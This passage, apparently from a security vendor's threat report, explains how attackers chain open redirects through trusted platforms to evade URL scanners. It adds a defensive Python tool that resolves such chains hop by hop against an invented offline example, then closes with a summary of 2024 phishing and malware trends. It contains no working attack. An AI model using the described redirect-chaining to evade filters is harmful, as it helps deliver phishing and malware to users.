This tactic is effective because many security tools prioritize analyzing the final destination URL. If just one step in the redirection chain is incorrectly parsed or not fully executed during analysis, the malicious site can evade detection. Additionally, the use of trusted domains, such as Google’s platforms, provides an air of legitimacy that makes it harder for both automated systems and users to identify the threat.
The impact of these attacks is significant, as they are used to deliver phishing pages, credential-stealing forms, and malware. Open redirection chains allow attackers to circumvent URL-based filtering systems and reputation analysis, making them a particularly stealthy and effective method for delivering malicious content.
Security tools that rely on pre-processing and scanning URLs must account for the complexity of open redirection chains. Determining the true nature of a URL often requires iterating through all intermediate steps until the final payload is revealed, emphasizing the need for more advanced detection capabilities.
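Resolving such a chain means fetching one hop at a time with automatic redirects disabled and recording every intermediate URL, including HTML meta-refresh hops that a plain HTTP client ignores. The Python below is an added example, not the report's tooling: resolve_chain takes a pluggable fetch function, the chain it walks is a constructed offline stand-in for the trusted-platform sequence described above (invented .example hosts), and embedded_urls pulls absolute URLs out of query parameters, the tell-tale shape of an open-redirect hop.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urljoin, urlparse

# <meta http-equiv="refresh" content="0; url=..."> -- a redirect that HTTP clients do not follow.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\']\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE)


def embedded_urls(url: str) -> list:
    """Absolute URLs carried in query parameters: the shape of an open-redirect hop."""
    found = []
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            p = urlparse(v)
            if p.scheme in ("http", "https") and p.netloc:
                found.append(v)
    return found


def next_hop(url: str, status: int, headers: dict, body: str):
    """The next URL implied by one response, or None when this is the final page."""
    lowered = {k.lower(): v for k, v in headers.items()}
    if 300 <= status < 400 and "location" in lowered:
        return urljoin(url, lowered["location"])
    m = META_REFRESH.search(body or "")
    return urljoin(url, m.group(1)) if m else None


def resolve_chain(start_url: str, fetch, max_hops: int = 15) -> dict:
    """Follow a redirect chain hop by hop. fetch(url) must return (status, headers, body)."""
    chain, seen, url = [start_url], {start_url}, start_url
    outcome = "hop-limit"            # too many hops is itself a reason to block
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        nxt = next_hop(url, status, headers, body)
        if nxt is None:
            outcome = "resolved"
            break
        if nxt in seen:
            outcome = "loop"
            break
        chain.append(nxt)
        seen.add(nxt)
        url = nxt
    hosts = list(dict.fromkeys(urlparse(u).netloc for u in chain))
    return {"status": outcome, "final": url, "hops": len(chain) - 1,
            "chain": chain, "hosts": hosts}


def live_fetch(url: str, timeout: int = 10):
    """Fetch a single hop without auto-following redirects (network use; not exercised here)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None              # make urllib surface 3xx instead of following it
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), ""


# Constructed offline chain: video site -> meeting link -> outbound redirect ->
# shortener (meta refresh) -> site-builder landing page. Hosts are invented.
START = "https://video.example/redirect?q=https://meet.example/abc"
CONSTRUCTED_RESPONSES = {
    START: (302, {"Location": "https://meet.example/abc"}, ""),
    "https://meet.example/abc": (302, {"Location": "/out?u=https://short.example/x1"}, ""),
    "https://meet.example/out?u=https://short.example/x1": (301, {"Location": "https://short.example/x1"}, ""),
    "https://short.example/x1": (200, {}, '<html><meta http-equiv="refresh" '
                                         'content="0; url=https://builder.example/landing"></html>'),
    "https://builder.example/landing": (200, {}, "<html>constructed final page</html>"),
}


def constructed_fetch(url: str):
    return CONSTRUCTED_RESPONSES.get(url, (404, {}, ""))


if __name__ == "__main__":
    print(resolve_chain(START, constructed_fetch))
```

JavaScript-driven redirects (a script assigning location.href) are invisible to this walker and need a browser-based step; a pipeline should treat a chain that ends on a page carrying such a script with the same suspicion as an unresolved hop. The live_fetch helper shows how to stop urllib from following redirects on its own so that every hop is observed and logged.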
Conclusion
In the second half of 2024, cybercriminals continued to develop new ways to avoid detection and increase the damage caused by their attacks. Attackers are using inventive techniques to hide malware, such as exploiting quirks in archive file formats and misusing features in Microsoft Office. A slowly growing trend is the use of AI and large language models by attackers, making it easier for them to create targeted and persuasive campaigns.
Phishing continues to be a top way that attackers gain access, as they take advantage of the trust people have in sites like Facebook, GitHub and LinkedIn to trick victims. More advanced social engineering tactics are being used, such as malicious advertising, QR code phishing, and attacks leveraging SVG files. Data breaches remain a serious problem, exposing billions of sensitive records and costing affected companies huge financial losses.
The combination of all these threats highlights the importance of a sophisticated security solution. Many of the techniques outlined are designed to evade static analysis, warranting the use of dynamic analysis methods like evasion-resistant sandboxes to gain insights into the malicious nature of the techniques.